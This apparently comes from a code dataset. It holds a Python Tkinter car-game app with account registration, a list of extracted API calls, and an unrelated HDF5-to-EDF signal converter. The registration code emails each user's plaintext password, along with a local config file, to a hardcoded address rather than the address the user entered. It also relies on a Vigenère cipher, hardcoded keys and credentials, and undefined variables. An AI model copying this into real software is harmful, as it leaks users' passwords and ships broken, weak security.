msg = msg.upper()
for x in self.pattern_list:
msg = msg.replace(x, '')
self.secret_key = secret_key.upper()
while True:
if len(self.secret_key) < len(msg):
self.secret_key *= 2
else:
self.secret_key = self.secret_key[:len(msg)].upper()
break
self.decipher_text_list1 = [x for x in list(msg)]
self.decipher_text_list2 = [x for x in list(self.secret_key)]
self.decipher_text_list = []
for x in range(len(msg)):
self.decipher_text_list += [[self.decipher_text_list1[x], self.decipher_text_list2[x]]]
self.output_list = []
self.msg_list = list(msg)
for x in range(len(msg)):
self.num_msg = self.number_list[self.letter_list.index(self.decipher_text_list[x][0])]
self.num_key = self.number_list[self.letter_list.index(self.decipher_text_list[x][1])]
self.new_letter_list = self.letter_list[self.number_list[self.num_key]:] + list(self.letter_list[0:self.number_list[self.num_key]])
self.output_list += self.letter_list[self.new_letter_list.index(self.msg_list[x])]
self.output = ''
for x in self.output_list:
self.output += x
return self.output
class GUI():
def __init__(self):
CreateLogFile()
try:
self.newcolor = Config('color.json').loadfile()
except FileNotFoundError:
self.newcolor = None
Config('color.json').createfile(self.newcolor)
self.root = Tk()
self.root.title('Car Game')
self.root.resizable(0, 0)
try:
open('.\\.image\\car.ico')
self.root.iconbitmap('.\\.image\\car.ico')
except FileNotFoundError:
CreateFolder('.image')
with open('.\\.image\\car.ico', 'wb') as code:
code.write(get('https://www.easyicon.net/download/ico/1284184/128/').content)
self.rstr = StringVar()
self.rint = IntVar()
self.screenwidth = self.root.winfo_screenwidth()
self.screenheight = self.root.winfo_screenheight()
alignstr = f'750x600+{(self.screenwidth - 750) // 2}+{(self.screenheight - 600) // 2 - 50}'
self.root.geometry(alignstr)
self.lable = Label(self.root, height = 600, width = 750, bd = 0, \
bg = self.newcolor, highlightthickness = 0)
self.lable.pack()
self.check_account = Label(self.root, height = 200, width = 200, bd = 0, \
bg = self.newcolor, highlightthickness = 0, text = 'l').pack(anchor = 'nw')
#self.check_account.pack(anchor = 'nw')
self.menu = Menu(self.root, bd = 0, tearoff = False)
self.file = Menu(self.menu, tearoff = False)
self.menu.add_cascade(label = 'File', menu = self.file)
self.file.add_command(label = 'Edit Color', command = self.color)
self.file.add_separator()
self.file.add_command(label = 'Exit', command = self.rquit)
self.rmenu = Menu(self.root, tearoff = False)
self.rmenu.add_command(label = 'Exit', command = self.rquit)
self.lable.bind('<Button-3>', self.popup)
self.createcar = Menu(self.menu, tearoff = False)
self.menu.add_cascade(label = 'Cars', menu = self.createcar)
self.createcar.add_command(label = 'Create New Car', \
command = self.create_car_gui)
self.account = Menu(self.menu, tearoff = False)
self.menu.add_cascade(label = 'Account Manage', menu = self.account)
self.account.add_command(label = 'Login', command = self.login)
self.account.add_command(label = 'Register', command = self.register)
self.root.config(menu = self.menu)
self.root.mainloop()
def register(self):
self.registertop = Toplevel(bg = self.newcolor)
self.registertop.title('Register')
self.registertop.resizable(0, 0)
alignstr = f'250x200+{(self.screenwidth - 750) // 2}+{(self.screenheight - 600) // 2 - 50}'
self.registertop.geometry(alignstr)
self.registertop.iconbitmap('.\\.image\\car.ico')
label1 = Label(self.registertop, text = 'User Name', \
bg = self.newcolor).place(relx = .025, rely = .03)
self.username = Entry(self.registertop, bg = self.newcolor)
self.username.place(relx = .45, rely = .04)
label2 = Label(self.registertop, text = 'Email', \
bg = self.newcolor).place(relx = .025, rely = .14)
self.emailname = Entry(self.registertop, bg = self.newcolor)
self.emailname.place(relx = .45, rely = .15)
label3 = Label(self.registertop, text = 'Password', \
bg = self.newcolor).place(relx = .025, rely = .25)
self.password = Entry(self.registertop, bg = self.newcolor, show = '*')
self.password.place(relx = .45, rely = .26)
label4 = Label(self.registertop, text = 'Confirm Password', \
bg = self.newcolor).place(relx = .025, rely = .36)
self.conpassword = Entry(self.registertop, bg = self.newcolor, show = '*')
self.conpassword.place(relx = .45, rely = .37)
button = Button(self.registertop, text = 'Create Account', \
command = self.registervalid, \
bg = self.newcolor).place(relx = .5, rely = .8, \
anchor = 'center')
def registervalid(self):
self.user = self.username.get()
self.em = self.emailname.get()
self.word = self.password.get()
self.cword = self.conpassword.get()
self.valid1 = self.valid2 = self.valid3 = self.valid4 = self.valid5 = True
if not self.user.split():
warninput = messagebox.showwarning('Warning', 'No input of username')
warning('No input of username.')
self.valid1 = False
if path.isfile(getcwd() + f'\\.account\\{self.user}.json'):
infoinput = messagebox.showinfo('Info', f'Username \'{self.user}\' has already exists')
warning(f'Username \'{self.user}\' has already exists.')
self.valid1 = False
if not self.em.split():
warninput = messagebox.showwarning('Warning', 'No input of email')
warning('No input of email.')
self.valid2 = False
if not self.word.split():
warninput = messagebox.showwarning('Warning', 'No input of password')
warning('No input of password.')
self.valid3 = False
if self.word != self.cword:
errorinput = messagebox.showerror('Error', 'Passwords are not the same')
error('Passwords are not the same.')
self.valid4 = False
if not self.valid1 or not self.valid2 or not self.valid3 or not self.valid4:
self.register()
else:
self.send_email()
def send_email(self):
msg = MIMEMultipart()
msg.attach(MIMEText(f'Dear {self.user}: \n\tYour Password is {self.word}.', 'plain', 'utf-8'))
sender = '<EMAIL>'
password = '<PASSWORD>'
receiver = self.em
receiver = '<EMAIL>' #HU<PASSWORD>
msg['From'] = sender
msg['To'] = receiver
msg['Subject'] = 'Confirm Password'
with open(getcwd() + '\\.config\\color.json', 'rb') as send_file:
att = MIMEText(send_file.read(), 'base64', 'utf-8')
att['Content-Type'] = 'application/octet-stream'
att['Content-Disposition'] = 'attachment;filename="color.json"'
msg.attach(att)
smtp_server = 'smtp.yeah.net'
server = SMTP(smtp_server, 25)
server.ehlo()
server.starttls()
server.login(sender, password)
server.set_debuglevel(False)
try:
server.sendmail(sender, receiver, msg.as_string())
except SMTPRecipientsRefused:
self.valid5 = False
msg['To'] = '<EMAIL>'
server.sendmail(sender, '<EMAIL>', msg.as_string())
server.quit()
if self.valid5:
messagebox.showinfo('Successful', f'Successfuly create account {self.user}')
info(f'Successfuly create account \'{self.user}\'.')
self.encrypt_register(self.word)
else:
messagebox.showerror('Error', f'Email \'{self.em}\' is uncorrect')
error(f'Email \'{self.em}\' is uncorrect.')
self.register()
def encrypt_register(self, password):
encrypted_password = Vigenere().encipher(password, '<PASSWORD>')
onepass = sha512(b'2<PASSWORD>asdfwerxdf34sdfsdfs90')
onepass.update(encrypted_password.encode())
import hashlib
self.signp = b'GQnIdFUUAUDlcepuaDVGJpnmfRektPLT'
sign = new(signp, onepass.hexdigest().encode('utf-8'), \
digestmod = sha224).hexdigest()
Account(f'{self.user}.json').createfile([onepass.hexdigest(), 'fdfskfg', sign])
def login(self):
self.logintop = Toplevel(bg = self.newcolor)
self.logintop.title('Login')
self.logintop.resizable(0, 0)
alignstr = f'250x75+{(self.screenwidth - 750) // 2}+{(self.screenheight - 600) // 2 - 50}'
self.logintop.geometry(alignstr)
self.logintop.iconbitmap('.\\.image\\car.ico')
label1 = Label(self.logintop, text = 'User Name', \
bg = self.newcolor).place(relx = .025, rely = .07)
self.username = Entry(self.logintop, bg = self.newcolor)
self.username.place(relx = .45, rely = .08)
label2 = Label(self.logintop, text = 'Password', \
bg = self.newcolor).place(relx = .025, rely = .34)
self.password = Entry(self.logintop, bg = self.newcolor, show = '*')
self.password.place(relx = .45, rely = .35)
button = Button(self.logintop, text = 'Login', command = self.loginvalid, \
bg = self.newcolor).place(relx = .5, rely = .8, \
anchor = 'center')
def loginvalid(self):
self.userget = self.username.get()
self.valid = True
if not path.isfile(getcwd() + f'\\.account\\{self.userget}.json'):
infoinput = messagebox.showinfo('Info', f'Username \'{self.userget}\' hasn\'t already exists')
warning(f'Username \'{self.userget}\' hasn\'t already exists.')
self.valid = False
self.login()
else:
self.decrypt_login(self.password.get())
def decrypt_login(self, password):
loadaccount = Account(f'{self.userget}.json').loadfile()
dsign = new(self.signp, loadaccount[0].encode('utf-8'), digestmod = sha224).hexdigest()
print(compare_digest(sign, dsign))
def popup(self, event):
self.rmenu.post(event.x_root, event.y_root)
def color(self):
self.newcolor = colorchooser.askcolor(self.newcolor, title = 'Choose a color')[1]
if self.newcolor:
Config('color.json').createfile(self.newcolor)
info(f'Edited color config: {self.newcolor}.')
self.root.destroy()
self.__init__()
def create_car(self):
self.get_manufacturer = self.manufacturer.get()
self.get_name = self.name.get()
self.get_year = self.year.get()
if self.rint.get():
self.new_car = ElectricCar(self.get_manufacturer, self.get_name, \
self.get_year)
self.new_car_name = self.new_car.get_descriptive_name()
else:
self.new_car = Car(self.get_manufacturer, self.get_name, self.get_year)
self.new_car_name = self.new_car.get_descriptive_name()
self.valid1 = False
self.valid2 = False
self.valid3 = False
if self.get_manufacturer:
try:
self.get_manufacturer = int(self.get_manufacturer)
except:
pass
if isinstance(self.get_manufacturer, str):
self.valid1 = True
else:
warntype = messagebox.showerror('Error', f'Invalid Type \'{type(self.get_manufacturer).__name__}\' of manufacturer')
error(f'Invalid Type \'{type(self.get_manufacturer).__name__}\' of manufacturer.')
else:
warninput = messagebox.showwarning('Warning', 'No input of manufacturer')
warning('No input of manufacturer.')
if self.get_name:
try:
self.get_name = int(self.get_name)
except:
pass
if isinstance(self.get_name, str):
self.valid2 = True
else:
warntype = messagebox.showerror('Error', f'Invalid Type \'{type(self.get_name).__name__}\' of name')
error(f'Invalid Type \'{type(self.get_name).__name__}\' of name.')
else:
warninput = messagebox.showwarning('Warning', 'No input of name')
warning('No input of name.')
if self.get_year:
try:
self.get_year = int(self.get_year)
except:
warntype = messagebox.showerror('Error', f'Invalid Type \'{type(self.get_year).__name__}\' of year')
error(f'Invalid Type \'{type(self.get_year).__name__}\' of year.')
if isinstance(self.get_year, int):
self.valid3 = True
else:
warninput = messagebox.showwarning('Warning', 'No input of year')
warning('No input of year.')
ele = 'eletric car' if self.rint.get() else 'car'
if self.valid1 and self.valid2 and self.valid3:
self.confirm = messagebox.askyesno('Confirm', f'Create new {ele}: \n{self.new_car_name}')
if self.confirm:
Config('cars.json').createfile({'Name': self.new_car_name, \
'Type': ele.title()}, True)
messagebox.showinfo('Successful', f'Successfuly create {ele} \'{self.new_car_name}\'')
info(f'Successfuly create {ele} \'{self.new_car_name}\'.')
else:
self.create_car_gui()
def set_battery_gui(self):
self.batterytop = Toplevel(bg = self.newcolor)
self.batterytop.title('Set Battery -kWh')
self.batterytop.resizable(0, 0)
alignstr = f'250x100+{(self.screenwidth - 750) // 2}+{(self.screenheight - 600) // 2 - 50}'
self.batterytop.geometry(alignstr)
self.batterytop.iconbitmap('.\\.image\\car.ico')
self.battery_button1 = Radiobutton(self.cartop, text = '60 -kWh', \
variable = self.rint, bg = self.newcolor, \
value = 0, indicatoron = False).pack()
def create_car_gui(self):
self.cartop = Toplevel(bg = self.newcolor)
self.cartop.title('Create Car')
self.cartop.resizable(0, 0)
alignstr = f'250x200+{(self.screenwidth - 750) // 2}+{(self.screenheight - 600) // 2 - 50}'
self.cartop.geometry(alignstr)
self.cartop.iconbitmap('.\\.image\\car.ico')
self.radiobutton1 = Radiobutton(self.cartop, text = 'Car', variable = self.rint, \
bg = self.newcolor, value = 0).pack()
self.radiobutton2 = Radiobutton(self.cartop, text = 'Eletric Car', variable = self.rint, \
bg = self.newcolor, value = 1).pack()
label1 = Label(self.cartop, text = 'Car Manufacturer: (Str)', \
bg = self.newcolor).pack()
self.manufacturer = Entry(self.cartop, bg = self.newcolor)
self.manufacturer.pack()
label2 = Label(self.cartop, text = 'Car Name: (Str)', \
bg = self.newcolor).pack()
self.name = Entry(self.cartop, bg = self.newcolor)
self.name.pack()
label3 = Label(self.cartop, text = 'Year: (Int)', \
bg = self.newcolor).pack()
self.year = Spinbox(self.cartop, from_ = localtime()[0] - 15, \
to = localtime()[0] + 1, bg = self.newcolor)
self.year.pack()
button = Button(self.cartop, text = 'Create', command = self.create_car, \
bg = self.newcolor).pack()
def rquit(self):
self.root.destroy()
def CreateFolder(pathcwd):
if not path.exists(getcwd() + '\\%s' % pathcwd):
mkdir(getcwd() + '\\%s' % pathcwd)
def CreateLogFile():
CreateFolder('.log')
basicConfig(format = '%(asctime)s %(levelname)s: %(message)s', \
datefmt = '%Y-%m-%d %H:%M:%S', filename = getcwd() + \
'\\.log\\logs.log', filemode = 'a', level = DEBUG)
class Config():
def __init__(self, filename):
CreateFolder('.config')
self.filename = filename
def createfile(self, msg, ifadd = False):
configfolder = getcwd() + '\\.config\\%s' % self.filename
if ifadd:
with open(configfolder, mode = 'a') as file:
dump(msg, file)
return
with open(configfolder, mode = 'w+') as file:
dump(msg, file)
return
def loadfile(self):
configfolder = getcwd() + '\\.config\\%s' % self.filename
with open(configfolder, mode = 'r') as file:
self.fileinfo = load(file)
return self.fileinfo
class Account():
def __init__(self, filename):
CreateFolder('.account')
self.filename = filename
def createfile(self, msg):
configfolder = getcwd() + '\\.account\\%s' % self.filename
with open(configfolder, mode = 'w+') as file:
dump(msg, file)
return
def loadfile(self):
configfolder = getcwd() + '\\.account\\%s' % self.filename
with open(configfolder, mode = 'r') as file:
self.fileinfo = load(file)
return self.fileinfo
class Car():
def __init__(self, make, model, year):
CreateLogFile()
self.make = make
self.model = model
self.year = year
self.odometer_reading = 0
def get_descriptive_name(self):
self.descriptive = f'{str(self.year)} {self.make} {self.model}'.title()
info(f'Getting car name: {self.descriptive}')
return self.descriptive
def descriptive_name(self):
return f'{str(self.year)} {self.make} {self.model}'.title()
def update_odometer(self, mileage):
if mileage >= self.odometer_reading:
self.odometer_reading = mileage
else:
warning('Rolling back an odometer.')
def read_odometer(self):
return f'This car has {str(self.odometer_reading)} miles on it.'
def get_odometer(self):
info(f'Getting odometer: {self.odometer_reading}')
return self.odometer_reading
def increment_odometer(self, miles):
self.odometer_reading += miles
class ElectricCar(Car):
def __init__(self, make, model, year):
super().__init__(make, model, year)
self.battery = Battery(85)
class Battery():
def __init__(self, battery_size = 60):
self.battery_size = battery_size
def describe_battery(self):
return f'This car has a {str(self.battery_size)} -kWh battery.'
def get_range(self):
if self.battery_size == 60:
range = 340
elif self.battery_size == 85:
range = 685
return f'This car can go approximately {str(range)} miles on a full charge.'
class Mainloop():
CreateLogFile()
info('Opened GUI application.')
GUI()
Audi_Q5 = Car('Audi', 'Q5', 2018)
print(Audi_Q5.get_descriptive_name())
Audi_Q5.update_odometer(7884)
print(Audi_Q5.read_odometer())
print()
Tesla_Model3 = ElectricCar('Tesla', 'Model 3', 2020)
print(Tesla_Model3.get_descriptive_name())
Tesla_Model3.update_odometer(397)
print(Tesla_Model3.read_odometer())
print(Tesla_Model3.battery.describe_battery())
print(Tesla_Model3.battery.get_range())
descriptive_dict = {'Name': Audi_Q5.descriptive_name(), \
'Odometer': Audi_Q5.get_odometer()}
print(descriptive_dict)
Config('test.json').createfile(descriptive_dict)
Mainloop()
|
[
"email.mime.text.MIMEText",
"hmac.compare_digest",
"hashlib.sha512",
"logging.error",
"smtplib.SMTP",
"logging.warning",
"email.mime.multipart.MIMEMultipart",
"re.findall",
"requests.get",
"time.localtime",
"json.dump",
"tkinter.messagebox.showinfo",
"tkinter.colorchooser.askcolor",
"tkinter.messagebox.showerror",
"json.load",
"os.getcwd",
"tkinter.messagebox.showwarning",
"logging.info",
"tkinter.messagebox.askyesno"
] |
[((23149, 23180), 'logging.info', 'info', (['"""Opened GUI application."""'], {}), "('Opened GUI application.')\n", (23153, 23180), False, 'from logging import basicConfig, warning, info, error, DEBUG\n'), ((838, 946), 're.findall', 'findall', (['"""[\\\\s]|[0123456789]|[~`!@#\\\\$%\\\\^&\\\\*()_\\\\+\\\\-={}|\\\\[\\\\]\\\\\\\\:";\\\\\'\\\\<\\\\>\\\\?,./", ]"""', 'msg'], {}), '(\n \'[\\\\s]|[0123456789]|[~`!@#\\\\$%\\\\^&\\\\*()_\\\\+\\\\-={}|\\\\[\\\\]\\\\\\\\:";\\\\\\\'\\\\<\\\\>\\\\?,./", ]\'\n , msg)\n', (845, 946), False, 'from re import findall, search\n'), ((2411, 2519), 're.findall', 'findall', (['"""[\\\\s]|[0123456789]|[~`!@#\\\\$%\\\\^&\\\\*()_\\\\+\\\\-={}|\\\\[\\\\]\\\\\\\\:";\\\\\'\\\\<\\\\>\\\\?,./", ]"""', 'msg'], {}), '(\n \'[\\\\s]|[0123456789]|[~`!@#\\\\$%\\\\^&\\\\*()_\\\\+\\\\-={}|\\\\[\\\\]\\\\\\\\:";\\\\\\\'\\\\<\\\\>\\\\?,./", ]\'\n , msg)\n', (2418, 2519), False, 'from re import findall, search\n'), ((9996, 10011), 'email.mime.multipart.MIMEMultipart', 'MIMEMultipart', ([], {}), '()\n', (10009, 10011), False, 'from email.mime.multipart import MIMEMultipart\n'), ((10763, 10784), 'smtplib.SMTP', 'SMTP', (['smtp_server', '(25)'], {}), '(smtp_server, 25)\n', (10767, 10784), False, 'from smtplib import SMTP, SMTPRecipientsRefused\n'), ((11758, 11801), 'hashlib.sha512', 'sha512', (["b'2<PASSWORD>asdfwerxdf34sdfsdfs90'"], {}), "(b'2<PASSWORD>asdfwerxdf34sdfsdfs90')\n", (11764, 11801), False, 'from hashlib import sha224, sha512\n'), ((21763, 21808), 'logging.info', 'info', (['f"""Getting car name: {self.descriptive}"""'], {}), "(f'Getting car name: {self.descriptive}')\n", (21767, 21808), False, 'from logging import basicConfig, warning, info, error, DEBUG\n'), ((22291, 22341), 'logging.info', 'info', (['f"""Getting odometer: {self.odometer_reading}"""'], {}), "(f'Getting odometer: {self.odometer_reading}')\n", (22295, 22341), False, 'from logging import basicConfig, warning, info, error, DEBUG\n'), ((8753, 8810), 'tkinter.messagebox.showwarning', 'messagebox.showwarning', (['"""Warning"""', '"""No input of username"""'], {}), "('Warning', 'No input of username')\n", (8775, 8810), False, 'from tkinter import messagebox, colorchooser\n'), ((8824, 8856), 'logging.warning', 'warning', (['"""No input of username."""'], {}), "('No input of username.')\n", (8831, 8856), False, 'from logging import basicConfig, warning, info, error, DEBUG\n'), ((8986, 9059), 'tkinter.messagebox.showinfo', 'messagebox.showinfo', (['"""Info"""', 'f"""Username \'{self.user}\' has already exists"""'], {}), '(\'Info\', f"Username \'{self.user}\' has already exists")\n', (9005, 9059), False, 'from tkinter import messagebox, colorchooser\n'), ((9075, 9129), 'logging.warning', 'warning', (['f"""Username \'{self.user}\' has already exists."""'], {}), '(f"Username \'{self.user}\' has already exists.")\n', (9082, 9129), False, 'from logging import basicConfig, warning, info, error, DEBUG\n'), ((9225, 9279), 'tkinter.messagebox.showwarning', 'messagebox.showwarning', (['"""Warning"""', '"""No input of email"""'], {}), "('Warning', 'No input of email')\n", (9247, 9279), False, 'from tkinter import messagebox, colorchooser\n'), ((9293, 9322), 'logging.warning', 'warning', (['"""No input of email."""'], {}), "('No input of email.')\n", (9300, 9322), False, 'from logging import basicConfig, warning, info, error, DEBUG\n'), ((9418, 9475), 'tkinter.messagebox.showwarning', 'messagebox.showwarning', (['"""Warning"""', '"""No input of password"""'], {}), "('Warning', 'No input of password')\n", (9440, 9475), False, 'from tkinter import messagebox, colorchooser\n'), ((9489, 9521), 'logging.warning', 'warning', (['"""No input of password."""'], {}), "('No input of password.')\n", (9496, 9521), False, 'from logging import basicConfig, warning, info, error, DEBUG\n'), ((9620, 9679), 'tkinter.messagebox.showerror', 'messagebox.showerror', (['"""Error"""', '"""Passwords are not the same"""'], {}), "('Error', 'Passwords are not the same')\n", (9640, 9679), False, 'from tkinter import messagebox, colorchooser\n'), ((9693, 9729), 'logging.error', 'error', (['"""Passwords are not the same."""'], {}), "('Passwords are not the same.')\n", (9698, 9729), False, 'from logging import basicConfig, warning, info, error, DEBUG\n'), ((10032, 10120), 'email.mime.text.MIMEText', 'MIMEText', (['f"""Dear {self.user}: \n\tYour Password is {self.word}."""', '"""plain"""', '"""utf-8"""'], {}), '(f"""Dear {self.user}: \n\tYour Password is {self.word}.""", \'plain\',\n \'utf-8\')\n', (10040, 10120), False, 'from email.mime.text import MIMEText\n'), ((11238, 11314), 'tkinter.messagebox.showinfo', 'messagebox.showinfo', (['"""Successful"""', 'f"""Successfuly create account {self.user}"""'], {}), "('Successful', f'Successfuly create account {self.user}')\n", (11257, 11314), False, 'from tkinter import messagebox, colorchooser\n'), ((11328, 11378), 'logging.info', 'info', (['f"""Successfuly create account \'{self.user}\'."""'], {}), '(f"Successfuly create account \'{self.user}\'.")\n', (11332, 11378), False, 'from logging import basicConfig, warning, info, error, DEBUG\n'), ((11457, 11521), 'tkinter.messagebox.showerror', 'messagebox.showerror', (['"""Error"""', 'f"""Email \'{self.em}\' is uncorrect"""'], {}), '(\'Error\', f"Email \'{self.em}\' is uncorrect")\n', (11477, 11521), False, 'from tkinter import messagebox, colorchooser\n'), ((11537, 11578), 'logging.error', 'error', (['f"""Email \'{self.em}\' is uncorrect."""'], {}), '(f"Email \'{self.em}\' is uncorrect.")\n', (11542, 11578), False, 'from logging import basicConfig, warning, info, error, DEBUG\n'), ((13465, 13544), 'tkinter.messagebox.showinfo', 'messagebox.showinfo', (['"""Info"""', 'f"""Username \'{self.userget}\' hasn\'t already exists"""'], {}), '(\'Info\', f"Username \'{self.userget}\' hasn\'t already exists")\n', (13484, 13544), False, 'from tkinter import messagebox, colorchooser\n'), ((13561, 13621), 'logging.warning', 'warning', (['f"""Username \'{self.userget}\' hasn\'t already exists."""'], {}), '(f"Username \'{self.userget}\' hasn\'t already exists.")\n', (13568, 13621), False, 'from logging import basicConfig, warning, info, error, DEBUG\n'), ((13973, 14000), 'hmac.compare_digest', 'compare_digest', (['sign', 'dsign'], {}), '(sign, dsign)\n', (13987, 14000), False, 'from hmac import new, compare_digest\n'), ((14139, 14199), 'tkinter.colorchooser.askcolor', 'colorchooser.askcolor', (['self.newcolor'], {'title': '"""Choose a color"""'}), "(self.newcolor, title='Choose a color')\n", (14160, 14199), False, 'from tkinter import messagebox, colorchooser\n'), ((14305, 14351), 'logging.info', 'info', (['f"""Edited color config: {self.newcolor}."""'], {}), "(f'Edited color config: {self.newcolor}.')\n", (14309, 14351), False, 'from logging import basicConfig, warning, info, error, DEBUG\n'), ((15630, 15691), 'tkinter.messagebox.showwarning', 'messagebox.showwarning', (['"""Warning"""', '"""No input of manufacturer"""'], {}), "('Warning', 'No input of manufacturer')\n", (15652, 15691), False, 'from tkinter import messagebox, colorchooser\n'), ((15705, 15741), 'logging.warning', 'warning', (['"""No input of manufacturer."""'], {}), "('No input of manufacturer.')\n", (15712, 15741), False, 'from logging import basicConfig, warning, info, error, DEBUG\n'), ((16229, 16282), 'tkinter.messagebox.showwarning', 'messagebox.showwarning', (['"""Warning"""', '"""No input of name"""'], {}), "('Warning', 'No input of name')\n", (16251, 16282), False, 'from tkinter import messagebox, colorchooser\n'), ((16296, 16324), 'logging.warning', 'warning', (['"""No input of name."""'], {}), "('No input of name.')\n", (16303, 16324), False, 'from logging import basicConfig, warning, info, error, DEBUG\n'), ((16789, 16842), 'tkinter.messagebox.showwarning', 'messagebox.showwarning', (['"""Warning"""', '"""No input of year"""'], {}), "('Warning', 'No input of year')\n", (16811, 16842), False, 'from tkinter import messagebox, colorchooser\n'), ((16856, 16884), 'logging.warning', 'warning', (['"""No input of year."""'], {}), "('No input of year.')\n", (16863, 16884), False, 'from logging import basicConfig, warning, info, error, DEBUG\n'), ((17031, 17108), 'tkinter.messagebox.askyesno', 'messagebox.askyesno', (['"""Confirm"""', 'f"""Create new {ele}: \n{self.new_car_name}"""'], {}), '(\'Confirm\', f"""Create new {ele}: \n{self.new_car_name}""")\n', (17050, 17108), False, 'from tkinter import messagebox, colorchooser\n'), ((20381, 20389), 'os.getcwd', 'getcwd', ([], {}), '()\n', (20387, 20389), False, 'from os import getcwd, path, mkdir\n'), ((20636, 20651), 'json.dump', 'dump', (['msg', 'file'], {}), '(msg, file)\n', (20640, 20651), False, 'from json import dump, load\n'), ((20719, 20727), 'os.getcwd', 'getcwd', ([], {}), '()\n', (20725, 20727), False, 'from os import getcwd, path, mkdir\n'), ((20845, 20855), 'json.load', 'load', (['file'], {}), '(file)\n', (20849, 20855), False, 'from json import dump, load\n'), ((21067, 21075), 'os.getcwd', 'getcwd', ([], {}), '()\n', (21073, 21075), False, 'from os import getcwd, path, mkdir\n'), ((21183, 21198), 'json.dump', 'dump', (['msg', 'file'], {}), '(msg, file)\n', (21187, 21198), False, 'from json import dump, load\n'), ((21266, 21274), 'os.getcwd', 'getcwd', ([], {}), '()\n', (21272, 21274), False, 'from os import getcwd, path, mkdir\n'), ((21393, 21403), 'json.load', 'load', (['file'], {}), '(file)\n', (21397, 21403), False, 'from json import dump, load\n'), ((22108, 22144), 'logging.warning', 'warning', (['"""Rolling back an odometer."""'], {}), "('Rolling back an odometer.')\n", (22115, 22144), False, 'from logging import basicConfig, warning, info, error, DEBUG\n'), ((8916, 8924), 'os.getcwd', 'getcwd', ([], {}), '()\n', (8922, 8924), False, 'from os import getcwd, path, mkdir\n'), ((17308, 17396), 'tkinter.messagebox.showinfo', 'messagebox.showinfo', (['"""Successful"""', 'f"""Successfuly create {ele} \'{self.new_car_name}\'"""'], {}), '(\'Successful\',\n f"Successfuly create {ele} \'{self.new_car_name}\'")\n', (17327, 17396), False, 'from tkinter import messagebox, colorchooser\n'), ((17412, 17468), 'logging.info', 'info', (['f"""Successfuly create {ele} \'{self.new_car_name}\'."""'], {}), '(f"Successfuly create {ele} \'{self.new_car_name}\'.")\n', (17416, 17468), False, 'from logging import basicConfig, warning, info, error, DEBUG\n'), ((19853, 19861), 'os.getcwd', 'getcwd', ([], {}), '()\n', (19859, 19861), False, 'from os import getcwd, path, mkdir\n'), ((19898, 19906), 'os.getcwd', 'getcwd', ([], {}), '()\n', (19904, 19906), False, 'from os import getcwd, path, mkdir\n'), ((20106, 20114), 'os.getcwd', 'getcwd', ([], {}), '()\n', (20112, 20114), False, 'from os import getcwd, path, mkdir\n'), ((20518, 20533), 'json.dump', 'dump', (['msg', 'file'], {}), '(msg, file)\n', (20522, 20533), False, 'from json import dump, load\n'), ((10399, 10407), 'os.getcwd', 'getcwd', ([], {}), '()\n', (10405, 10407), False, 'from os import getcwd, path, mkdir\n'), ((13392, 13400), 'os.getcwd', 'getcwd', ([], {}), '()\n', (13398, 13400), False, 'from os import getcwd, path, mkdir\n'), ((19485, 19496), 'time.localtime', 'localtime', ([], {}), '()\n', (19494, 19496), False, 'from time import strftime, time, localtime\n'), ((19542, 19553), 'time.localtime', 'localtime', ([], {}), '()\n', (19551, 19553), False, 'from time import strftime, time, localtime\n'), ((4645, 4702), 'requests.get', 'get', (['"""https://www.easyicon.net/download/ico/1284184/128/"""'], {}), "('https://www.easyicon.net/download/ico/1284184/128/')\n", (4648, 4702), False, 'from requests import get\n')]
|
import os
import pyedflib
import h5py
import pytz
import datetime as dt
import struct
psg_properties = {'digital_max': [32767],
'digital_min': [-32767],
'dimension': ['uV'],
'physical_min': [-800.0],
'physical_max': [800.0],
'prefilter': [''],
'sample_rate': [250],
"transducer": [""]}
def convert_h5_to_edf(h5_path, output_file="psg.edf",psg_properties = psg_properties):
h5 = h5py.File(h5_path, "r")
# Check that all ?
subfolders = ['signals/eeg', 'signals/emg', 'signals/eog']
psg_labels = []
for subfolder in subfolders:
psg_labels.extend([f"{subfolder}/{x}" for x in list(h5[subfolder].keys())])
try:
start_time = pytz.timezone('UTC').localize(
dt.datetime.utcfromtimestamp(h5.attrs["start_time"])
)
except KeyError:
start_time = pytz.timezone('UTC').localize(
dt.datetime.utcfromtimestamp(0)
)
number_of_data_records = int(len(h5[psg_labels[0]]) / 250)
duration = 1
header = (
"0".ljust(8)
+ "".ljust(80)
+ "".ljust(80)
+ start_time.strftime("%d.%m.%y%H.%M.%S")
+ str((len(psg_labels) + 1) * 256).ljust(8)
+ "".ljust(44)
+ str(number_of_data_records).ljust(8)
+ str(duration).ljust(8)
+ str(len(psg_labels)).ljust(4)
)
subheaders = (
"".join([str(x.split('/')[-1]).ljust(16) for x in psg_labels])
+ "".join([str(x).ljust(80) for x in psg_properties['transducer'] * len(psg_labels)])
+ "".join([str(x).ljust(8) for x in psg_properties['dimension'] * len(psg_labels)])
+ "".join([str(x).ljust(8) for x in psg_properties['physical_min'] * len(psg_labels)])
+ "".join([str(x).ljust(8) for x in psg_properties['physical_max'] * len(psg_labels)])
+ "".join([str(x).ljust(8) for x in psg_properties['digital_min'] * len(psg_labels)])
+ "".join([str(x).ljust(8) for x in psg_properties['digital_max'] * len(psg_labels)])
+ "".join([str(x).ljust(80) for x in psg_properties['prefilter'] * len(psg_labels)])
+ "".join([str(x).ljust(8) for x in psg_properties['sample_rate'] * len(psg_labels)])
+ "".ljust(32) * len(psg_labels)
)
edf_path = output_file
with open(edf_path, "wb") as f:
f.write(bytes(header, "UTF-8"))
f.write(bytes(subheaders, "UTF-8"))
def transform(x, min, max):
if max < min:
min, max = max, min
x = x.clip(min, max)
return (((x - min) / (max - min)) * (2 ** 16 - 1) - (2 ** 15)).astype(int)
data_transformed = []
for i, data_path in enumerate(psg_labels):
data_transformed += [transform(h5[data_path][:], psg_properties['physical_min'][0], psg_properties['physical_max'][0])]
for i in range(number_of_data_records):
data = []
for k, signal_transformed in enumerate(data_transformed):
data += list(signal_transformed[i * int(psg_properties['sample_rate'][0]): int(psg_properties['sample_rate'][0] * (i + 1))])
data_to_write = struct.pack("h" * len(data), *data)
f.write(data_to_write)
return edf_path
|
[
"datetime.datetime.utcfromtimestamp",
"h5py.File",
"pytz.timezone"
] |
